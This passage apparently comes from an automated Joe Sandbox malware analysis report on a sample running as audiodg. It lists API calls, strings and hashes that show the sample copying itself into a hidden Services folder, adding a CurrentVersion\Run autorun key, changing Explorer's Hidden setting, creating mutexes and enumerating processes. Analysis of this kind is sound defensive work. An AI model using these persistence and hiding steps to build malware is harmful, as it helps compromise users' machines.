                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A75), ref: 00007FF6EC843901
                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A75), ref: 00007FF6EC843911
                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A75), ref: 00007FF6EC843924
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A75), ref: 00007FF6EC843939
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A75), ref: 00007FF6EC84394C
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A75), ref: 00007FF6EC843961
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1649423034.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649389168.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649455241.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649495890.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649526207.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649553221.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                        • Opcode ID: 7c7c7247d549d9e37f092b5a31a3711d0059d00c133cc5beb443fd3bd3c84089
                                                                                                                                                                                                                        • Instruction ID: d77552cfb861518e15c4d9933bd481844d880808afc11595cb1899ad43302efe
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7c7c7247d549d9e37f092b5a31a3711d0059d00c133cc5beb443fd3bd3c84089
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D115132628A8285DB609F25F96476B6766FBC4744F405031DB8EC3A28DF3ED00AC749
                                                                                                                                                                                                                        Function 00007FF6EC842E08 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1649423034.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649389168.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649455241.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649495890.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649526207.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649553221.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                        • String ID: rbNSpGEsyb
                                                                                                                                                                                                                        • API String ID: 299056699-189039185
                                                                                                                                                                                                                        • Opcode ID: 10555049a1e5e970aacc173f1715d106100e4f0dc8ec30993202ec39d8a78e4e
                                                                                                                                                                                                                        • Instruction ID: e296fa7e49e5820c9149ff6456813a9eb4538730f88792b8f6aa760aca9abc7c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 10555049a1e5e970aacc173f1715d106100e4f0dc8ec30993202ec39d8a78e4e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A01973790CA02C1E620AB11E95432E6B69FB98B99F440536D94EC2674CE3ED586C60A
                                                                                                                                                                                                                        Function 00007FF6EC843DF0 Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1649423034.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649389168.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649455241.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649495890.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649526207.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649553221.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1083639309-0
                                                                                                                                                                                                                        • Opcode ID: 7a16b558b3a5aabe8e9edc648b30ff0989d79b9dce4d7edaa0226f1c99cc9121
                                                                                                                                                                                                                        • Instruction ID: f6baec687dc45716914e2202dd0cce3dc731cd0b5fca89c39e91acdc4108bee7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a16b558b3a5aabe8e9edc648b30ff0989d79b9dce4d7edaa0226f1c99cc9121
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D212432A0CB86C1E7709B11E94836B6765FBD4B54F004235C65DC3AA8DF3ED446DB05
                                                                                                                                                                                                                        Function 00007FF6EC842EA8 Relevance: 12.0, APIs: 8, Instructions: 31synchronizationCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1649423034.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649389168.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649455241.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649495890.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649526207.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649553221.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 299056699-0
                                                                                                                                                                                                                        • Opcode ID: 0ff44a8e6de8ed1e0195ea57690e214b8abe1ab05dd50aed0b9b1818bdfdce29
                                                                                                                                                                                                                        • Instruction ID: 0b6dada5b3aae7f8f2c4982300c5f43df4fcd1206379ab56418d7aa0044b1e5f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ff44a8e6de8ed1e0195ea57690e214b8abe1ab05dd50aed0b9b1818bdfdce29
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3601C83791CA42C2E724AB21E95432E6B75FBC9B45F400131E98EC2664DF3ED546C60A
                                                                                                                                                                                                                        Function 00007FF6EC843CB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1649423034.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649389168.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649455241.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649495890.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649526207.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649553221.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                        • String ID: Unknown
                                                                                                                                                                                                                        • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                        • Opcode ID: fdec89f59edf3eb6797727eaad360a689e09697676163aab672e6b7c8a7a61d1
                                                                                                                                                                                                                        • Instruction ID: b5c2acc127dbabb0f4cd78dc2310d38f4ef331255a0ee6f7181339c3b69a71b0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fdec89f59edf3eb6797727eaad360a689e09697676163aab672e6b7c8a7a61d1
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0331E33661CBC486DB709B19E4883ABA7A4FB98B41F000225DA8DC3B68DF3DD141CB04
                                                                                                                                                                                                                        Function 00007FF6EC843A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37fileCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843710: GetWindowsDirectoryW.KERNEL32 ref: 00007FF6EC843750
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843710: GetVolumeInformationW.KERNEL32 ref: 00007FF6EC8437CD
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843710: wsprintfW.USER32 ref: 00007FF6EC84386E
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843890: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A75), ref: 00007FF6EC8438D9
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A75), ref: 00007FF6EC8438EE
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A75), ref: 00007FF6EC843901
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843890: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A75), ref: 00007FF6EC843911
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843890: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A75), ref: 00007FF6EC843924
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A75), ref: 00007FF6EC843939
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A75), ref: 00007FF6EC84394C
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A75), ref: 00007FF6EC843961
                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32 ref: 00007FF6EC843A85
                                                                                                                                                                                                                        • DeleteFileW.KERNEL32 ref: 00007FF6EC843A90
                                                                                                                                                                                                                        • CopyFileW.KERNEL32 ref: 00007FF6EC843AA9
                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32 ref: 00007FF6EC843AC1
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1649423034.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649389168.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649455241.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649495890.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649526207.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649553221.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: Services
                                                                                                                                                                                                                        • API String ID: 3209240227-2319745855
                                                                                                                                                                                                                        • Opcode ID: eb4493f17a959604dfb05488033e14cb6fbd039b0084e85697ddad03d65a5255
                                                                                                                                                                                                                        • Instruction ID: 77a3632330913b3bfa931f120506ab724b0bc24aa5f143e486236bbc7e0f0bee
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb4493f17a959604dfb05488033e14cb6fbd039b0084e85697ddad03d65a5255
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E015663B18642A2EB50DB24E5543AB5764FF94744F805436D34DC36A4EE3ED20BCB49
                                                                                                                                                                                                                        Function 00007FF6EC843B50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1649423034.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649389168.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649455241.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649495890.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649526207.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649553221.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseOpenValue
                                                                                                                                                                                                                        • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                                        • API String ID: 779948276-85274793
                                                                                                                                                                                                                        • Opcode ID: eeeb668cb3ebc31c330d6d5e78252b73bef579c735708216c362ce484c2523da
                                                                                                                                                                                                                        • Instruction ID: d75a30e932ca09d5cb6126222c6413d0f704238b0463d9250f5f122f22f10148
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eeeb668cb3ebc31c330d6d5e78252b73bef579c735708216c362ce484c2523da
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FE01E976618B808AD7609B14E84471BBBA4F789794F501225EB8D83B68DF7DC146CF05
                                                                                                                                                                                                                        Function 00007FF6EC8413C4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1649423034.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649389168.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649455241.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649495890.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649526207.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649553221.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: @$IsWow64Process$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-1447682865
                                                                                                                                                                                                                        • Opcode ID: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                        • Instruction ID: 097c750978b034a87c946fdcf66dbd7de47845eee35a68986c5f60c2a5ea295e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1601EC33A0C64686E6308B50F54432B6BA9FB84749F904136E68E82A94DF7DD54ACB49
                                                                                                                                                                                                                        Function 00007FF6EC843FD0 Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1649423034.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649389168.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649455241.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649495890.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649526207.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649553221.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2850635065-0
                                                                                                                                                                                                                        • Opcode ID: 7ef93d6c8be03e0e8067038787ae35eedaf0d19a6d09eeffd0ee61b9360f4694
                                                                                                                                                                                                                        • Instruction ID: 4f1fd506de209004544cb52340f5bf98fd53888d2f640363b00424def6097a17
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ef93d6c8be03e0e8067038787ae35eedaf0d19a6d09eeffd0ee61b9360f4694
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C111C32A0C68685E7B09F10F58836B67A5FBD4755F004234DA9DC2698DF3ED416DB05
                                                                                                                                                                                                                        Function 00007FF6EC843710 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1649423034.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649389168.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649455241.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649495890.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649526207.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649553221.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                        • API String ID: 3001812590-640692576
                                                                                                                                                                                                                        • Opcode ID: ba7099422deb3340150bc710d1235fe6d0c1360a6f14ed1e57a7d3e671112d6e
                                                                                                                                                                                                                        • Instruction ID: 45ff897bc5d91808437ea90333bb12b3cf9921c1964b8707abc91c4afc848710
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ba7099422deb3340150bc710d1235fe6d0c1360a6f14ed1e57a7d3e671112d6e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AD31032661C6C1C6DB20DF64E5983ABB7A4FB94740F400136E68DC3A98EF3EC50ACB05
                                                                                                                                                                                                                        Function 00007FF6EC843980 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43registryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1649423034.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649389168.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649455241.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649495890.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649526207.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649553221.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseOpenValue
                                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                        • API String ID: 779948276-1428018034
                                                                                                                                                                                                                        • Opcode ID: 63c1ccfa42da33961596c073b4ba4259c04753ac5328876c0619d7e38573e54f
                                                                                                                                                                                                                        • Instruction ID: df953291f2fbe7a1ed63d0f73803c9c6c752601c87f8ded175100d0a37a4ef21
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 63c1ccfa42da33961596c073b4ba4259c04753ac5328876c0619d7e38573e54f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB115E32628B8086D7908B14F54072BBBA4FB847A0F105230F9AE83BE8DF7DD145CB04
                                                                                                                                                                                                                        Function 00007FF6EC841088 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1649423034.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649389168.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649455241.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649495890.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649526207.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649553221.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: GetThreadId$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-2383230424
                                                                                                                                                                                                                        • Opcode ID: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                        • Instruction ID: d8a8707037e08fb5cf08d690587cc28aa04cb35a63961b93133711a4397e9681
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 41E01236918A83C2D624DB10F94832E67A4FB84745F900132E58E82A64EF3DD54ACB09
                                                                                                                                                                                                                        Function 00007FF6EC842F38 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 34memoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843890: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A75), ref: 00007FF6EC8438D9
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A75), ref: 00007FF6EC8438EE
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A75), ref: 00007FF6EC843901
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843890: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A75), ref: 00007FF6EC843911
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843890: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A75), ref: 00007FF6EC843924
